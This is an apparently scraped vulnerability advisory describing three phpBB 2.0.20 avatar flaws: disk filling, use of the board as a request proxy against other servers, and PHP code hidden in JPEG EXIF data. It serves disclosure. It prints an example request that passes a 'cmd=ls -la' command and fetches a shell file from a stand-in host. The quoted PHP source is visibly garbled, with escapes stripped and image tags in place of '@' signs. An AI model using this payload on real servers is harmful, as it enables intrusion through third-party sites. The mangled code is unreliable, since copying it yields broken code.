PHPBB 2.0.20 persistent issues with avatars

Credit: rgod
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PHPBB 2.0.20 multiple issues with avatars some problems persistently lie in the way it handles remote and uploaded avatars: a remote user can: (1) saturate the server with unuseful files, 'cause phpbb do not delete the previous one when you upload a new avatar (2) use PhpBB installations to launch exploits against other servers, using "avatarurl" argument when you modify your profile as path of a GET request. Look usercp_avatar.php near lines 125-153: ... if ( $avatar_mode == 'remote' && preg_match('/^(http://)?([w-.]+):?([0-9]*)/(.*)$/', $avatar_filename, $url_ary) ) { if ( empty($url_ary[4]) ) { $error = true; $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL']; return; } $base_get = '/' . $url_ary[4]; $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80; if ( !($fsock = <img src="/imgs/at.gif" border=0 align=middle>fsockopen($url_ary[2], $port, $errno, $errstr)) ) { $error = true; $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL']; return; } <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "GET $base_get HTTP/1.1rn"); <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "HOST: " . $url_ary[2] . "rn"); <img src="/imgs/at.gif" border=0 align=middle>fputs($fsock, "Connection: closernrn"); unset($avatar_data); while( !<img src="/imgs/at.gif" border=0 align=middle>feof($fsock) ) { $avatar_data .= <img src="/imgs/at.gif" border=0 align=middle>fread($fsock, $board_config['avatar_filesize']); } <img src="/imgs/at.gif" border=0 align=middle>fclose($fsock); ... phpbb do not check if the user supplied value ends with an image extension, neither checks if the supplied string contains "&" and "?" chars. So, you can submit a value like this: phpbb will launch a GET request like this: GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0 HOST: Connection: close obviously you have no output, but this makes phpbb to be like a http proxy (3) inject some php code inside jpeg files as EXIF metadata content: this, in combinations with third party vulnerable code can be used to compromise the server where PHP is installed. Should be enough to check for php code inside the temporary files before to copy the new avatar in "images/avatars/" folder. rgod --------------------------------------------------------------------------------- mail: rgod [at] autistici [dot] org site:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top